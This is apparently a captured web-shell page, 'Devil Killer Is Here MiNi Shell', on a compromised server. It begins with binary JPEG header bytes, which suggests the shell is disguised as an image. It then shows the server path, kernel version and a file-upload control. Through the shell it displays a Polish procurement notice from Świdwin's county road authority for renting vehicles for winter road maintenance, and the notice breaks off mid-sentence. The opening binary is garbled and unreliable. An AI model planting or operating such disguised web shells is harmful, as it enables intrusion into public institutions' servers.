JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221102/0041913401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Wynajem pojazdów i maszyn do świadczenia na rzecz Zamawiającego usług przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Świdwińskiego w sezonie 2022/2023”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Świdwinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330965207</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Podmiejska 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdwin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94350309</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@powiatswidwinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.pzd.powiatswidwinski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Wynajem pojazdów i maszyn do świadczenia na rzecz Zamawiającego usług przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Świdwińskiego w sezonie 2022/2023”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4828294e-5a92-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00419134</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00043254/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wynajem pojazdów i maszyn do świadczenia na rzecz Zamawiającego usług przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Świdwińskiego w sezonie 2022/2023”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzdswidwin.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzdswidwin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy i pełnomocnictwo o ile występuje, należy sporządzić w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podst. art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U z 2021 r. poz. 2070 z poźn. zm.), przy czym Zamawiający zaleca sporządzanie ich w formacie danych: „.pdf”, „.doc”, lub „.docx”, ze szczególnym wskazaniem na format „.pdf”. <br/>2)	Informacje, oświadczenia lub dokumenty inne niż określone w pkt. 1), należy sporządzić w postaci elektronicznej w formatach danych wskazanych w pkt. 1), lub jako tekst wpisany bezpośrednio do wiadomości przekazanej przy użyciu Platformy; <br/>3)	Inne dokumenty lub oświadczenia sporządzone w języku obcym, należy przekazywać wraz z tłumaczeniem na język polski; <br/>4)	W przypadku gdy dokumenty, lub dokumenty potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy będą stanowiły:<br/>a)	dokument elektroniczny – należy przekazać ten dokument; <br/>b)	dokument w postaci papierowej – należy przekazać cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. <br/>5)	Przez cyfrowe odwzorowanie, o którym mowa w pkt. 4) lit. b) należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału; <br/>6)	Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje Wykonawca, <br/>7)	Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz; <br/>8)	W przypadku przekazywania dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W celu ewentualnej kompresji danych, Zamawiający zaleca wykorzystanie jednego z formatów: „.zip” lub „.7Z”. <br/>9)	Sposób sporządzania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U z 2020 r. poz. 2452); <br/>10) Składanie przez Wykonawców oświadczeń, dokumentów oraz innych informacji odbywa się elektronicznie – za pośrednictwem Platformy (poprzez formularz „Wyślij wiadomość do Zamawiającego”). Komunikacja poprzez „Wyślij wiadomość do Zamawiającego” umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Za datę przekazania składanych dokumentów, oraz innych informacji uznaje się datę ich doręczenia za pośrednictwem „Wyślij wiadomość do Zamawiającego”, i pojawienie się komunikatu, że wiadomość została wysłana do Zamawiającego; <br/>11) Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem „Wyślij wiadomość do Zamawiającego” wynosi 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">5.	Zgodnie z art. 13 ust. 1 i 2 RODO, zamawiający informuje, że: <br/>1)	administratorem a w przypadku zamówień współfinansowanych ze środków UE (jeżeli dotyczy) również podmiotem przetwarzającym wszelkie dane osobowe osób fizycznych związanych z niniejszym postępowaniem jest Powiatowy Zarząd Dróg w Świdwinie;<br/>2)	inspektorem ochrony danych osobowych w Powiatowym Zarządzie Dróg w Świdwinie jest Pan Robert Kosmala, tel. 515 106 912, e-mail: pzd@powiatswidwinski.pl.;<br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia,<br/>4)	odbiorcami ww. danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP0,<br/>5)	ww. dane osobowe będą przechowywane odpowiednio:<br/>- przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego albo przez cały okres obowiązywania umowy w sprawie zamówienia publicznego - jeżeli okres obowiązywania umowy przekracza 4 lata; <br/>- do czasu przeprowadzania archiwizacji dokumentacji - w zakresie określonym w przepisach o archiwizacji, <br/>6)	obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy,<br/>7)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8)	osoba fizyczna, której dane osobowe dotyczą posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do ww. danych osobowych. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia o którym mowa w art. 15 ust. 1-3 RODO, zamawiający może żądać od osoby, występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia; <br/>b)	na podstawie art. 16 RODO prawo do sprostowania ww. danych osobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego załączników); <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych. Zgłoszenie żądania ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania. W przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie przetwarzania danych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba, że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy RODO,<br/>9)	osobie fizycznej, której dane osobowe dotyczą nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPR-442/4/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Świdwinie mieszczącego się przy ulicy Podmiejskiej 18<br/>- wynajem samochodu ciężarowego o ładowności od 7 Mg do 170 godz. pracy do odśnieżania i posypywania dróg (piaskarka i pług lekki powierzony przez Zamawiającego)<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b) Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>c) Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>d)	Ustalona stawka dzienna za gotowość nie będzie naliczana w sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>e)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60181000-0 - Wynajem samochodów ciężarowych wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Połczynie Zdroju mieszczącego się przy ulicy Młyńskiej 17<br/>- wynajem samochodu ciężarowego o ładowności 5-10 Mg do 170 godz. pracy do odśnieżania i posypywania dróg (piaskarka i pług lekki powierzony przez Zamawiającego)<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b) Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>c) Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>d)	Ustalona stawka dzienna za gotowość nie będzie naliczana w sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>e)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60181000-0 - Wynajem samochodów ciężarowych wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części części zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Świdwinie mieszczącego się przy ulicy Podmiejskiej 18<br/>- wynajem ciągnika rolniczego z dwiema osiami napędowymi i rozsypywarką do mieszanki piaskowo-solnej o pojemności od 3 m3 (RCW lub równoważne) do 170 godz. pracy do odśnieżania i posypywania dróg (pług lekki powierzony przez Zamawiającego)<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b) Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>c) Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>d)	Ustalona stawka dzienna za gotowość nie będzie naliczana w 